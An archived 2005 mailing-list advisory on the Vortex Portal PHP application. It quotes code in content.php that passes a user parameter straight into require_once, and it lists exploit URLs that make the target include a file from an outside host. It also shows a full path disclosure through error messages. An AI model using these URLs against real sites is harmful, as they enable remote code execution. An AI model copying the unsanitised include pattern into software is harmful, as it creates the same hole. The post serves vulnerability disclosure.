OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Vortex Portal

From: Francisco Alisson (dominusvisclick21.com.br)
Date: Wed Mar 23 2005 - 06:23:43 CST


Vortex Portal Multiples Bugs

Vendor: http://www.VortexPortal.net
Contact: Brian Price Email: VGChattershaw.ca

I. Remote File Inclusion:

content.php -->

...
if (!isset($act)) {
        require_once("main.php");
} else {
        require_once("$act.php");
...
?>

index.php -->
...
require_once($root_dir."/content.php");
...

Exploits
 http://[target-host]/index.php?act=http://[host]/file
 http://[target-host]/content.php?act=http://[host]/file

II. Full Path Disclosure
 http://[target-host]/content.php?act=something-wrong
 and we've get :

 Warning: main(something-wrond.php): failed to open stream: No such file or directory in /home/*/content.php on line 9

 Fatal error: main(): Failed opening required 'something-wrond.php' (include_path='.:/usr/local/lib/php:/usr/lib/php:../:../') in /home/*/content.php on line 9

Ps.: the vendor wasn't informed.

[ Infektion Group ]
 by Dominus_Vis